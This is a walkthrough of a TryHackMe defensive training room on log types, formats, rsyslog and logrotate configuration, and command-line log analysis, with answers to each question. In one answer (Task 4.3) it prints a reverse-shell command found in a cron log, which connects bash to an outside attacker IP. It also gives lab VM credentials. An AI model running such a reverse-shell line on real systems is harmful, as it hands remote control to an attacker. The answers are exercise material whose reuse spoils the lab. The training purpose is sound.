Intro to Logs— SOC Level 2— Log Analysis-TryHackMe Walkthrough
Learn the fundamentals of logging, data sources, collection methods and principles to step into the log analysis world.
Site Link: https://tryhackme.com/r/room/introtologs
Task 1 Introduction
How can we identify malicious activities? What kind of evidence is generated when an intruder breaches a network? Why is it essential to recognise these indicators within our environment?
Logs serve as invaluable records of past events, providing essential insights to address these questions. By preserving an archive of historical activities, we can bolster our security posture and protect our digital assets more effectively.
A comprehensive understanding of logs is crucial for identifying patterns and mitigating potential threats.
As manually examining the vast amount of log data generated by numerous systems and applications can be challenging, it is vital to grasp the intricacies of log analysis and become acquainted with the available tools and techniques.
Log analysis tools and methods empower individuals to interpret historical events and establish a reliable source of historical evidence, streamlining the processing and scrutiny of log data. This efficiency facilitates prompt detection and response to potential incidents or significant events.
By analysing logs as records of historical activities, individuals and organisations can gain essential knowledge, enhancing their overall awareness and preparedness across a wide range of situations.
Learning Objectives
This room covers how logs can be used to record an adversary’s actions, the tools and techniques needed to perform log analysis, and the significance of effectively collecting and analysing logs.
- Understand the importance of logs as a historical activity record for identifying and mitigating potential threats
- Explore various types of logs, logging mechanisms and collection methods across multiple platforms
- Gain hands-on experience detecting and defeating adversaries through log analysis
Recommended Reading
This room will primarily focus on logs and log files using a Linux-based VM, for those interested in Windows-specific event logs, completing the Windows Event Logs room is recommended.
Join us in this exciting journey, where you will develop the expertise needed to fortify the security posture of assets across diverse platforms with logs!
Answer the questions below
I’m ready to learn more about logs.
Task 2 Expanding Perspectives: Logs as Evidence of Historical Activity
Working with Logs: Scenario
Scenario: A web server of SwiftSpend Financial is constantly bombarded with scans from an adversary. As a systems administrator of this organisation tasked to address this predicament, you must identify what the adversary is doing by configuring logging and analysing collected logs.
IMPORTANT: The user damianhall has limited sudo privileges. Issue the command sudo -l to check what commands can be run by this user. These limited commands are all that are needed to complete the subsequent tasks.
Connecting to the machine
Start the virtual machine in split-screen view by clicking the green Start Machine button below.
If the VM is not visible, use the blue Show Split View button at the top-left of the page. Alternatively, using the credentials below, you can connect to the VM via RDP or SSH.
Username damianhall Password Logs321! IP MACHINE_IP
IMPORTANT: The attached VM contains artefacts to help us better understand logs and the implications of their analysis to the detection engineering and incident response practices. Work on the subsequent tasks and experiment with the VM through a case example. Escalation of Privileges is NOT necessary to answer the questions in this room.
In the Heart of Data: Logs
Just as a physical tree’s rings reveal its life story — indicating good years with thick curls and challenging ones with thin — a digital log provides a historical record of system activity.
Both embody a fundamental principle of growth over time and serve as living records in their respective domains — physical and digital.
In the digital world, every interaction with a computer system — from authentication attempts, granting authorisation, accessing a file, and connecting to a network to encountering a system error — will always leave a digital footprint in the form of logs.
Logs are a record of events within a system. These records provide a detailed account of what a system has been doing, capturing a wide range of events such as user logins, file accesses, system errors, network connections, and changes to data or system configurations.
While the specific details may differ based on the type of log, a log entry usually includes the following information:
- A timestamp of when an event was logged
- The name of the system or application that generated the log entry
- The type of event that occurred
- Additional details about the event, such as the user who initiated the event or the device’s IP address that generated the event
This information is typically stored in a log file, which contains aggregated entries of what occurred at any given time on a system.
However, since digital interactions are continuous and fast-paced, the log file’s size may exponentially grow depending on the activities logged on a system.
The True Power of Logs: Contextual Correlation
A single log entry may seem insignificant on its own. But when log data is aggregated, analysed, and cross-referenced with other sources of information, it becomes a potent investigation tool. Logs can answer critical questions about an event, such as:
- What happened?
- When did it happen?
- Where did it happen?
- Who is responsible?
- Were their actions successful?
- What was the result of their action?
The following hypothetical scenario can illustrate this aspect. Suppose a student allegedly accessed inappropriate content on a University network. By reviewing the logs, a systems administrator could then answer the following:
The example above emphasises how logs are instrumental in piecing together a complete picture of an event, thereby enhancing our understanding and ability to respond effectively.
Answer the questions below
2.1 What is the name of your colleague who left a note on your Desktop?
Answer: Perry
2.2 What is the full path to the suggested log file for initial investigation?
Answer: /var/log/gitlab/nginx/access
Task 3 Types, Formats, and Standards
Log Types
Specific log types can offer a unique perspective on a system’s operation, performance, and security. While there are various log types, we will focus on the most common ones that cover approximately 80% of the typical use cases.
Below is a list of some of the most common log types:
- Application Logs: Messages about specific applications, including status, errors, warnings, etc.
- Audit Logs: Activities related to operational procedures crucial for regulatory compliance.
- Security Logs: Security events such as logins, permissions changes, firewall activity, etc.
- Server Logs: Various logs a server generates, including system, event, error, and access logs.
- System Logs: Kernel activities, system errors, boot sequences, and hardware status.
- Network Logs: Network traffic, connections, and other network-related events.
- Database Logs: Activities within a database system, such as queries and updates.
- Web Server Logs: Requests processed by a web server, including URLs, response codes, etc.
Understanding the various log types, formats, and standards is critical for practical log analysis. It enables an analyst to effectively parse, interpret, and gain insights from log data, facilitating troubleshooting, performance optimisation, incident response, and threat hunting.
Log Formats
A log format defines the structure and organisation of data within a log file. It specifies how the data is encoded, how each entry is delimited, and what fields are included in each row. These formats can vary widely and may fall into three main categories: Semi-structured, Structured, and Unstructured. We’ll explore these categories and illustrate their usage with examples.
- Semi-structured Logs: These logs may contain structured and unstructured data, with predictable components accommodating free-form text. Examples include:
- Syslog Message Format: A widely adopted logging protocol for system and network logs.
- Example of a log file utilising the Syslog Format
damianhall@WEBSRV-02:~/logs$ cat syslog.txt May 31 12:34:56 WEBSRV-02 CRON[2342593]: (root) CMD ([ -x /etc/init.d/anacron ] && if [ ! -d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi)
- Windows Event Log (EVTX) Format: Proprietary Microsoft log for Windows systems.
- Example of a log file utilising the Windows Event Log (EVTX) Format
PS C:\WINDOWS\system32> Get-WinEvent -Path "C:\Windows\System32\winevt\Logs\Application.evtx" ProviderName: Microsoft-Windows-Security-SPP TimeCreated Id LevelDisplayName Message ----------- -- ---------------- ------- 31/05/2023 17:18:24 16384 Information Successfully scheduled Software Protection service for re-start 31/05/2023 17:17:53 16394 Information Offline downlevel migration succeeded.
- Structured Logs: Following a strict and standardised format, these logs are conducive to parsing and analysis. Typical structured log formats include:
- Field Delimited Formats: Comma-Separated Values (CSV) and Tab-Separated Values (TSV) are formats often used for tabular data.
- Example of a log file utilising CSV Format
damianhall@WEBSRV-02:~/logs$ cat log.csv "time","user","action","status","ip","uri" "2023-05-31T12:34:56Z","adversary","GET",200,"34.253.159.159","http://gitlab.swiftspend.finance:80/"
- JavaScript Object Notation (JSON): Known for its readability and compatibility with modern programming languages.
- Example of a log file utilising the JSON Format
damianhall@WEBSRV-02:~/logs$ cat log.json {"time": "2023-05-31T12:34:56Z", "user": "adversary", "action": "GET", "status": 200, "ip": "34.253.159.159", "uri": "http://gitlab.swiftspend.finance:80/"}
- W3C Extended Log Format (ELF): Defined by the World Wide Web Consortium (W3C), customizable for web server logging. It is typically used by Microsoft Internet Information Services (IIS) Web Server.
- Example of a log file utilising W3C Extended Log Format (ELF)
damianhall@WEBSRV-02:~/logs$ cat elf.log #Version: 1.0 #Fields: date time c-ip c-username s-ip s-port cs-method cs-uri-stem sc-status 31-May-2023 13:55:36 34.253.159.159 adversary 34.253.127.157 80 GET /explore 200
- eXtensible Markup Language (XML): Flexible and customizable for creating standardized logging formats.
- Example of a log file utilising an XML Format
damianhall@WEBSRV-02:~/logs$ cat log.xml <log><time>2023-05-31T12:34:56Z</time><user>adversary</user><action>GET</action><status>200</status><ip>34.253.159.159</ip><url>https://gitlab.swiftspend.finance/</url></log>
- Unstructured Logs: Comprising free-form text, these logs can be rich in context but may pose challenges in systematic parsing. Examples include:
- NCSA Common Log Format (CLF): A standardized web server log format for client requests. It is typically used by the Apache HTTP Server by default.
- Example of a log file utilising NCSA Common Log Format (CLF)
damianhall@WEBSRV-02:~/logs$ cat clf.log 34.253.159.159 - adversary [31/May/2023:13:55:36 +0000] "GET /explore HTTP/1.1" 200 4886
- NCSA Combined Log Format (Combined): An extension of CLF, adding fields like referrer and user agent. It is typically used by Nginx HTTP Server by default.
- Example of a log file utilising NCSA Combined Log Format (Combined)
damianhall@WEBSRV-02:~/logs$ cat combined.log 34.253.159.159 - adversary [31/May/2023:13:55:36 +0000] "GET /explore HTTP/1.1" 200 4886 "http://gitlab.swiftspend.finance/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
IMPORTANT: Custom-defined formats can be crafted to meet specific applications or use cases. These formats provide flexibility but may necessitate specialised parsing tools for effective interpretation and analysis.
Log Standards
A log standard is a set of guidelines or specifications that define how logs should be generated, transmitted, and stored. Log standards may specify the use of particular log formats, but they also cover other aspects of logging, such as what events should be logged, how logs should be transmitted securely, and how long logs should be retained. Examples of log standards include:
- Common Event Expression (CEE): This standard, developed by MITRE, provides a common structure for log data, making it easier to generate, transmit, store, and analyse logs.
- OWASP Logging Cheat Sheet: A guide for developers on building application logging mechanisms, especially related to security logging.
- Syslog Protocol: Syslog is a standard for message logging, allowing separation of the software that generates messages from the system that stores them and the software that reports and analyses them.
- NIST Special Publication 800–92: This publication guides computer security log management.
- Azure Monitor Logs: Guidelines for log monitoring on Microsoft Azure.
- Google Cloud Logging: Guidelines for logging on the Google Cloud Platform (GCP).
- Oracle Cloud Infrastructure Logging: Guidelines for logging on the Oracle Cloud Infrastructure (OCI).
- Virginia Tech — Standard for Information Technology Logging: Sample log review and compliance guideline.
Answer the questions below
3.1 Based on the list of log types in this task, what log type is used by the log file specified in the note from Task 2?
The log file suggested in the note is located under /var/log/gitlab/, and GitLab is a web-based application, the logs generated can indeed fall under Web Server Logs. These logs would typically record requests made to the GitLab web server, including access information, URLs, response codes, and other related events.
Answer: Web Server Logs
3.2 Based on the list of log formats in this task, what log format is used by the log file specified in the note from Task 2?
The logs use the NCSA Combined Log Format. This is a common way web servers record details, such as who visited the website, what they did, when they did it, and the web browser they used.
Answer: Combined
Task 4 Collection, Management, and Centralisation
Log Collection
Log collection is an essential component of log analysis, involving the aggregation of logs from diverse sources such as servers, network devices, software, and databases.
For logs to effectively represent a chronological sequence of events, it’s crucial to maintain the system’s time accuracy during logging. Utilising the Network Time Protocol (NTP) is a method to achieve this synchronisation and ensure the integrity of the timeline stored in the logs.
As this is a foundational step to ensuring that a security analyst would have a comprehensive data set to review, the following is a simple step-by-step process to achieving this, bearing in mind the need to prioritise the collection based on significant information:
- Identify Sources: List all potential log sources, such as servers, databases, applications, and network devices.
- Choose a Log Collector: Opt for a suitable log collector tool or software that aligns with your infrastructure.
- Configure Collection Parameters: Ensure that time synchronisation is enabled through NTP to maintain accurate timelines, adjust settings to determine which events to log at what intervals, and prioritise based on importance.
- Test Collection: Once configured, run a test to ensure logs are appropriately collected from all sources.
IMPORTANT: Please be aware that NTP-based time synchronisation may not be possible to replicate with the VM since it has no internet connectivity. However, when performing this in practice, using pool.ntp.org to find an NTP server is best. Time synchronisation can be performed automatically on Linux-based systems or manually initiated by executing. ntpdate pool.ntp.org
.
Example of Time Synchronisation with NTP on a Linux-based System
root@WEBSRV-02:~# ntpdate pool.ntp.org
12 Aug 21:03:44 ntpdate[2399365]: adjust time server 85.91.1.180 offset 0.000060 sec
root@WEBSRV-02:~# date
Saturday, 12 August, 2023 09:04:55 PM UTC
root@WEBSRV-02:~#
Log Management
Efficient Log Management ensures that every gathered log is stored securely, organised systematically, and is ready for swift retrieval. A hybrid approach can provide a balanced solution by hoarding all log files and selectively trimming.
Once you’ve collated your logs, effective management of them is paramount. These steps can be followed to achieve this:
- Storage: Decide on a secure storage solution, considering factors like retention period and accessibility.
- Organisation: Classify logs based on their source, type, or other criteria for easier access later.
- Backup: Regularly back up your logs to prevent data loss.
- Review: Periodically review logs to ensure they are correctly stored and categorised.
Log Centralisation
Centralisation is pivotal for swift log access, in-depth analysis, and rapid incident response. A unified system allows for efficient log management with tools that offer real-time detection, automatic notifications, and seamless integration with incident management systems.
Centralising your logs can significantly streamline access and analysis. Here’s a simple process for achieving it:
- Choose a Centralised System: Opt for a system that consolidates logs from all sources, such as the Elastic Stack or Splunk.
- Integrate Sources: Connect all your log sources to this centralised system.
- Set Up Monitoring: Utilise tools that provide real-time monitoring and alerts for specified events.
- Integration with Incident Management: Ensure that your centralised system can integrate seamlessly with any incident management tools or protocols you have in place.
Practical Activity: Log Collection with rsyslog
This activity aims to introduce rsyslog
and demonstrate how it can enhance the centralisation and management of logs. As part of the collection process, we will configure rsyslog
to log all sshd messages to a specific file, such as /var/log/websrv-02/rsyslog_sshd.log
. The steps below can be followed to achieve this:
- Open a Terminal.
- Ensure rsyslog is Installed: You can check if rsyslog is installed by running the command:
sudo systemctl status rsyslog
- Create a Configuration File: Use a text editor to create the following configuration file:
gedit /etc/rsyslog.d/98-websrv-02-sshd.conf
,nano /etc/rsyslog.d/98-websrv-02-sshd.conf
,vi /etc/rsyslog.d/98-websrv-02-sshd.conf
, orvim /etc/rsyslog.d/98-websrv-02-sshd.conf
- Add the Configuration: Add the following lines in
/etc/rsyslog.d/98-websrv-02-sshd.conf
to direct the sshd messages to the specific log file:
$FileCreateMode 0644 :programname, isequal, "sshd" /var/log/websrv-02/rsyslog_sshd.log
- Save and Close the Configuration File.
- Restart rsyslog: Apply the changes by restarting rsyslog with the command:
sudo systemctl restart rsyslog
- Verify the Configuration: You can verify the configuration works by initiating an SSH connection to localhost via
ssh localhost
or by checking the log file after a minute or two.
IMPORTANT: If remote forwarding of logs is not configured, tools such as scp
/ rsync
, among others, can be utilised for the manual collection of logs.
Answer the questions below
4.1 After configuring rsyslog for sshd, what username repeatedly appears in the sshd logs at /var/log/websrv-02/rsyslog_sshd.log, indicating failed login attempts or brute forcing?
Open a Terminal.
Ensure rsyslog is Installed
sudo systemctl status rsyslog
Create a Configuration File
nano /etc/rsyslog.d/98-websrv-02-sshd.conf
Add the Configuration: Add the following lines in /etc/rsyslog.d/98-websrv-02-sshd.conf to direct the sshd messages to the specific log file:
$FileCreateMode 0644
:programname, isequal, “sshd” /var/log/websrv-02/rsyslog_sshd.log
$FileCreateMode 0644
:programname, isequal, "sshd" /var/log/websrv-02/rsyslog_sshd.log
Save and Close the Configuration File
Restart rsyslog
sudo systemctl restart rsyslog
Verify the Configuration
ssh localhost
A terminal session where the user damianhall
has successfully logged into an Ubuntu 20.04.6 LTS system (WEBSRV-02
)
Now view the log file
cat /var/log/websrv-02/rsyslog_sshd.log
The username repeatedly appears in the sshd logs at /var/log/websrv-02/rsyslog_sshd.log, indicating failed login attempts or brute forcing
Answer: stansimo
4.2 What is the IP address of SIEM-02 based on the rsyslog configuration file /etc/rsyslog.d/99-websrv-02-cron.conf, which is used to monitor cron messages?
Open and examine the contents of the rsyslog configuration file located at /etc/rsyslog.d/99-websrv-02-cron.conf
cat /etc/rsyslog.d/99-websrv-02-cron.conf
Answer: 10.10.10.101
4.3 Based on the generated logs in /var/log/websrv-02/rsyslog_cron.log, what command is being executed by the root user?
View again the contents of the log file at /var/log/websrv-02/rsyslog_cron.log
cat /var/log/websrv-02/rsyslog_cron.log
Answer: /bin/bash -c “/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1”
This command attempts to establish a reverse shell connection to the IP address 34.253.159.159 on port 9999.
Task 5 Storage, Retention, and Deletion
Log Storage
Logs can be stored in various locations, such as the local system that generates them, a centralised repository, or cloud-based storage.
The choice of storage location typically depends on multiple factors:
- Security Requirements: Ensuring that logs are stored in compliance with organisational or regulatory security protocols.
- Accessibility Needs: How quickly and by whom the logs need to be accessed can influence the choice of storage.
- Storage Capacity: The volume of logs generated may require significant storage space, influencing the choice of storage solution.
- Cost Considerations: The budget for log storage may dictate the choice between cloud-based or local solutions.
- Compliance Regulations: Specific industry regulations governing log storage can affect the choice of storage.
- Retention Policies: The required retention time and ease of retrieval can affect the decision-making process.
- Disaster Recovery Plans: Ensuring the availability of logs even in system failure may require specific storage solutions.
Log Retention
It is vital to recognise that log storage is not infinite. Therefore, a reasonable balance between retaining logs for potential future needs and the storage cost is necessary. Understanding the concepts of Hot, Warm, and Cold storage can aid in this decision-making:
- Hot Storage: Logs from the past 3–6 months that are most accessible. Query speed should be near real-time, depending on the complexity of the query.
- Warm Storage: Logs from six months to 2 years, acting as a data lake, easily accessible but not as immediate as Hot storage.
- Cold Storage: Archived or compressed logs from 2–5 years. These logs are not easily accessible and are usually used for retroactive analysis or scoping purposes.
Managing the cost of storing logs is critical for organisations, and carefully selecting Hot, Warm, or Cold storage strategies can help keep these costs in check.
Log Deletion
Log deletion must be performed carefully to avoid removing logs that could still be of value. The backup of log files, especially crucial ones, is necessary before deletion.
It is essential to have a well-defined deletion policy to ensure compliance with data protection laws and regulations. Log deletion helps to:
- Maintain a manageable size of logs for analysis.
- Comply with privacy regulations, such as GDPR, which require unnecessary data to be deleted.
- Keep storage costs in balance.
Best Practices: Log Storage, Retention and Deletion
- Determine the storage, retention, and deletion policy based on both business needs and legal requirements.
- Regularly review and update the guidelines per changing conditions and regulations.
- Automate the storage, retention, and deletion processes to ensure consistency and avoid human errors.
- Encrypt sensitive logs to protect data.
- Regular backups should be made, especially before deletion.
Practical Activity: Log Management with logrotate
This activity aims to introduce logrotate
, a tool that automates log file rotation, compression, and management, ensuring that log files are handled systematically. It allows automatic rotation, compression, and removal of log files. As an example, here's how we can set it up for /var/log/websrv-02/rsyslog_sshd.log
:
- Create a Configuration File:
sudo gedit /etc/logrotate.d/98-websrv-02_sshd.conf
,sudo nano /etc/logrotate.d/98-websrv-02_sshd.conf
,sudo vi /etc/logrotate.d/98-websrv-02_sshd.conf
, orsudo vim /etc/logrotate.d/98-websrv-02_sshd.conf
- Define Log Settings:
/var/log/websrv-02/rsyslog_sshd.log { daily rotate 30 compress lastaction DATE=$(date +"%Y-%m-%d") echo "$(date)" >> "/var/log/websrv-02/hashes_"$DATE"_rsyslog_sshd.txt" for i in $(seq 1 30); do FILE="/var/log/websrv-02/rsyslog_sshd.log.$i.gz" if [ -f "$FILE" ]; then HASH=$(/usr/bin/sha256sum "$FILE" | awk '{ print $1 }') echo "rsyslog_sshd.log.$i.gz "$HASH"" >> "/var/log/websrv-02/hashes_"$DATE"_rsyslog_sshd.txt" fi done systemctl restart rsyslog endscript }
- Save and Close the file.
- Manual Execution:
sudo logrotate -f /etc/logrotate.d/98-websrv-02_sshd.conf
Answer the questions below
5.1 Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, how many versions of old compressed log file copies will be kept?
Create a Configuration File
sudo nano /etc/logrotate.d/98-websrv-02_sshd.conf
Define Log Settings
/var/log/websrv-02/rsyslog_sshd.log {
daily
rotate 30
compress
lastaction
DATE=$(date +"%Y-%m-%d")
echo "$(date)" >> "/var/log/websrv-02/hashes_"$DATE"_rsyslog_sshd.txt"
for i in $(seq 1 30); do
FILE="/var/log/websrv-02/rsyslog_sshd.log.$i.gz"
if [ -f "$FILE" ]; then
HASH=$(/usr/bin/sha256sum "$FILE" | awk '{ print $1 }')
echo "rsyslog_sshd.log.$i.gz "$HASH"" >> "/var/log/websrv-02/hashes_"$DATE"_rsyslog_sshd.txt"
fi
done
systemctl restart rsyslog
endscript
}
Save and Close the file.
After forces the logrotate tool to immediately rotate the SSH log file according to the specified settings in the configuration file.
sudo logrotate -f /etc/logrotate.d/98-websrv-02_sshd.conf
View the contents of the configuration file
cat /etc/logrotate.d/99-websrv-02_cron.conf
24 versions of old compressed log file copies will be kept
Answer: 24
5.2 Based on the logrotate configuration /etc/logrotate.d/99-websrv-02_cron.conf, what is the log rotation frequency?
- The configuration specifies hourly, which means the logs are rotated every hour.
Answer: hourly
Task 6 Hands-on Exercise: Log analysis process, tools, and techniques
Logs are more than mere records of historical events; they can serve as a guiding compass. They are invaluable resources that, when skillfully leveraged, can enhance system diagnostics, cyber security, and regulatory compliance efforts. Their role in keeping a record of historical activity for a system or application is crucial.
Log Analysis Process
Log analysis involves Parsing, Normalisation, Sorting, Classification, Enrichment, Correlation, Visualisation, and Reporting. It can be done through various tools and techniques, ranging from complex systems like Splunk and ELK to ad-hoc methods ranging from default command-line tools to open-source tools.
Data Sources
Data Sources are the systems or applications configured to log system events or user activities. These are the origin of logs.
Parsing
Parsing is breaking down the log data into more manageable and understandable components. Since logs come in various formats depending on the source, it’s essential to parse these logs to extract valuable information.
Normalisation
Normalisation is standardising parsed data. It involves bringing the various log data into a standard format, making comparing and analysing data from different sources easier. It is imperative in environments with multiple systems and applications, where each might generate logs in another format.
Sorting
Sorting is a vital aspect of log analysis, as it allows for efficient data retrieval and identification of patterns. Logs can be sorted by time, source, event type, severity, and any other parameter present in the data. Proper sorting is critical in identifying trends and anomalies that signal operational issues or security incidents.
Classification
Classification involves assigning categories to the logs based on their characteristics. By classifying log files, you can quickly filter and focus on those logs that matter most to your analysis. For instance, classification can be based on the severity level, event type, or source. Automated classification using machine learning can significantly enhance this process, helping to identify potential issues or threats that could be overlooked.
Enrichment
Log enrichment adds context to logs to make them more meaningful and easier to analyse. It could involve adding information like geographical data, user details, threat intelligence, or even data from other sources that can provide a complete picture of the event.
Enrichment makes logs more valuable, enabling analysts to make better decisions and more accurately respond to incidents. Like classification, log enrichment can be automated using machine learning, reducing the time and effort required for log analysis.
Correlation
Correlation involves linking related records and identifying connections between log entries. This process helps detect patterns and trends, making understanding complex relationships between various log events easier. Correlation is critical in determining security threats or system performance issues that might remain unnoticed.
Visualisation
Visualisation represents log data in graphical formats like charts, graphs, or heat maps. Visually presenting data makes recognising patterns, trends, and anomalies easier. Visualisation tools provide an intuitive way to interpret large volumes of log data, making complex information more accessible and understandable.
Reporting
Reporting summarises log data into structured formats to provide insights, support decision-making, or meet compliance requirements. Effective reporting includes creating clear and concise log data summaries catering to stakeholders’ needs, such as management, security teams, or auditors. Regular reports can be vital in monitoring system health, security posture, and operational efficiency.
Log Analysis Tools
Security Information and Event Management (SIEM) tools such as Splunk or Elastic Search can be used for complex log analysis tasks.
However, in scenarios where immediate data analysis is needed, such as during incident response, Linux-based systems can employ default tools like cat
, grep
, sed
, sort
, uniq
, and awk
, along with sha256sum
for hashing log files. Windows-based systems can utilise EZ-Tools and the default cmdlet Get-FileHash
for similar purposes. These tools enable rapid parsing and analysis, which suits these situations.
Additionally, proper acquisition should be observed by taking the log file’s hash during collection to ensure its admissibility in a court of law.
Therefore, it is imperative not only to log events but also to ensure their integrity, that they are analysed, and any lessons obtained from the logs be learned, as the safety and efficiency of an organisation can depend on them.
Log Analysis Techniques
Log analysis techniques are methods or practices used to interpret and derive insights from log data. These techniques can range from simple to complex and are vital for identifying patterns, anomalies, and critical insights. Here are some common techniques:
Pattern Recognition: This involves identifying recurring sequences or trends in log data. It can detect regular system behaviour or identify unusual activities that may indicate a security threat.
Anomaly Detection: Anomaly detection focuses on identifying data points that deviate from the expected pattern. It is crucial to spot potential issues or malicious activities early on.
Correlation Analysis: Correlating different log entries helps understand the relationship between various events. It can reveal causation and dependencies between system components and is vital in root cause analysis.
Timeline Analysis: Analysing logs over time helps understand trends, seasonalities, and periodic behaviours. It can be essential for performance monitoring and forecasting system loads.
Machine Learning and AI: Leveraging machine learning models can automate and enhance various log analysis techniques, such as classification and enrichment. AI can provide predictive insights and help in automating responses to specific events.
Visualisation: Representing log data through graphs and charts allows for intuitive understanding and quick insights. Visualisation can make complex data more accessible and assist in identifying key patterns and relationships.
Statistical Analysis: Using statistical methods to analyse log data can provide quantitative insights and help make data-driven decisions. Regression analysis and hypothesis testing can infer relationships and validate assumptions.
These techniques can be applied individually or in combination, depending on the specific requirements and complexity of the log analysis task. Understanding and using these techniques can significantly enhance the effectiveness of log analysis, leading to more informed decisions and robust security measures.
Working with Logs: Practical Application
Working with logs is a complex task requiring both comprehension and manipulation of data. This tutorial covers two scenarios. The first is handling unparsed raw log files accessed directly via an open-source Log Viewer tool. This method allows immediate analysis without preprocessing, which is ideal for quick inspections or preserving the original format.
The second scenario focuses on creating a parsed and consolidated log file using Unix tools like cat
, grep
, sed
, sort
, uniq
, and awk
. It involves merging, filtering, and formatting logs to create a standardised file. Accessible through the Log Viewer tool, this consolidated file offers a clear and efficient view of the data, aiding in identifying patterns and issues.
These approaches highlight the flexibility and significance of log analysis in system diagnostics and cyber security. Whether using raw or parsed logs, the ability to compile, view, and analyse data is vital for an organisation’s safety and efficiency.
Unparsed Raw Log Files
When dealing with raw log files, you can access them directly through the Log Viewer tool by specifying the paths in the URL. Here’s an example URL that includes multiple log files:
http://MACHINE_IP:8111/log?log=%2Fvar%2Flog%2Fgitlab%2Fnginx%2Faccess.log&log=%2Fvar%2Flog%2Fwebsrv-02%2Frsyslog_cron.log&log=%2Fvar%2Flog%2Fwebsrv-02%2Frsyslog_sshd.log&log=%2Fvar%2Flog%2Fgitlab%2Fgitlab-rails%2Fapi_json.log
Paste this URL into your browser to view the unparsed raw log files using the Log Viewer tool.
NOTE: You can access the URL using the AttackBox or VM browser. However, please be aware that Firefox on the VM may take a few minutes to boot up.
Parsed and Consolidated Log File
To create a parsed and consolidated log file, you can use a combination of Unix tools like cat
, grep
, sed
, sort
, uniq
, and awk
. Here's a step-by-step guide:
- Use
awk
andsed
to normalize the log entries to the desired format. For this example, we will sort by date and time:
# Process nginx access log awk -F'[][]' '{print "[" $2 "]", "--- /var/log/gitlab/nginx/access.log ---", "\"" $0 "\""}' /var/log/gitlab/nginx/access.log | sed "s/ +0000//g" > /tmp/parsed_consolidated.log # Process rsyslog_cron.log awk '{ original_line = $0; gsub(/ /, "/", $1); printf "[%s/%s/2023:%s] --- /var/log/websrv-02/rsyslog_cron.log --- \"%s\"\n", $2, $1, $3, original_line }' /var/log/websrv-02/rsyslog_cron.log >> /tmp/parsed_consolidated.log # Process rsyslog_sshd.log awk '{ original_line = $0; gsub(/ /, "/", $1); printf "[%s/%s/2023:%s] --- /var/log/websrv-02/rsyslog_sshd.log --- \"%s\"\n", $2, $1, $3, original_line }' /var/log/websrv-02/rsyslog_sshd.log >> /tmp/parsed_consolidated.log # Process gitlab-rails/api_json.log awk -F'"' '{timestamp = $4; converted = strftime("[%d/%b/%Y:%H:%M:%S]", mktime(substr(timestamp, 1, 4) " " substr(timestamp, 6, 2) " " substr(timestamp, 9, 2) " " substr(timestamp, 12, 2) " " substr(timestamp, 15, 2) " " substr(timestamp, 18, 2) " 0 0")); print converted, "--- /var/log/gitlab/gitlab-rails/api_json.log ---", "\""$0"\""}' /var/log/gitlab/gitlab-rails/api_json.log >> /tmp/parsed_consolidated.log
- Optional: Use
grep
to filter specific entries:
grep "34.253.159.159" /tmp/parsed_consolidated.log > /tmp/filtered_consolidated.log
- Use
sort
to sort all the log entries by date and time:
sort /tmp/parsed_consolidated.log > /tmp/sort_parsed_consolidated.log
- Use
uniq
to remove duplicate entries:
uniq /tmp/sort_parsed_consolidated.log > /tmp/uniq_sort_parsed_consolidated.log
You can now access the parsed and consolidated log file through the Log Viewer tool using the following URL:
http://MACHINE_IP:8111/log?path=%2Ftmp%2Funiq_sort_parsed_consolidated.log
NOTE: You can access the URL using the AttackBox or VM browser. However, please be aware that Firefox on the VM may take a few minutes to boot up.
Answer the questions below
6.1 Upon accessing the log viewer URL for unparsed raw log files, what error does “/var/log/websrv-02/rsyslog_cron.log” show when selecting the different filters? (Question Hint Click on the drop-down button beside “Add filter”.)
Open the Log Viewer useing the URL given for the log viewer
http://10.10.49.141:8111/log?log=%2Fvar%2Flog%2Fgitlab%2Fnginx%2Faccess.log&log=%2Fvar%2Flog%2Fwebsrv-02%2Frsyslog_cron.log&log=%2Fvar%2Flog%2Fwebsrv-02%2Frsyslog_sshd.log&log=%2Fvar%2Flog%2Fgitlab%2Fgitlab-rails%2Fapi_json.log
The error “No date field” appears in the log viewer’s filter dropdown menu when attempting to filter the logs. It indicates that the log entries do not contain a properly formatted date field that the log viewer tool can recognize for filtering or sorting purposes.
Answer: No date field
6.2 What is the process of standardising parsed data into a more easily readable and query-able format?
Answer: Normalisation
6.3 What is the process of consolidating normalised logs to enhance the analysis of activities related to a specific IP address?
Answer: Enrichment
Task 7 Conclusion
Congratulations! You’ve completed the Intro to Logs room.
In summary, we were able to learn and perform the following:
- The significance of logs as records of past activities; essential for pinpointing and tackling threats.
- Delve into an array of logs, their creation techniques, and the methods of gathering them from diverse systems.
- Review the results from analysing logs in the realms of detection engineering and incident handling.
- Acquire practical skills in identifying and countering adversaries via log analysis.
If you enjoyed this room, continue learning and developing proficiency in areas specific to Security Operations and Incident Response tooling, which may enhance your log analysis and overall Blue Teaming skills such as the following:
- Endpoint Detection and Response (EDR)
- Intro to Endpoint Security
- Aurora EDR
- Wazuh
- Intrusion Detection and Prevention Systems (IDPS)
- Snort
- Snort Challenge — The Basics
- Snort Challenge — Live Attacks
- Security Information and Event Management (SIEM)
- Investigating with ELK 101
- Splunk: Basics
- Incident handling with Splunk
Recognising that these security tools truly flourish in the hands of skilled individuals with the necessary information and technical expertise to combat potential threats and manage security incidents is vital.
Next Steps
As we conclude, we hope this exploration has instilled in you the importance and potential of logs. Now that you’ve comprehensively understood what logs are, why logging matters and how logging is performed, it’s time to proceed to the next room, Log Operations. May you harness this knowledge to fortify defences, detect adversaries, and drive your cyber security endeavours forward.
Answer the questions below
I’ve completed the Intro to Logs room.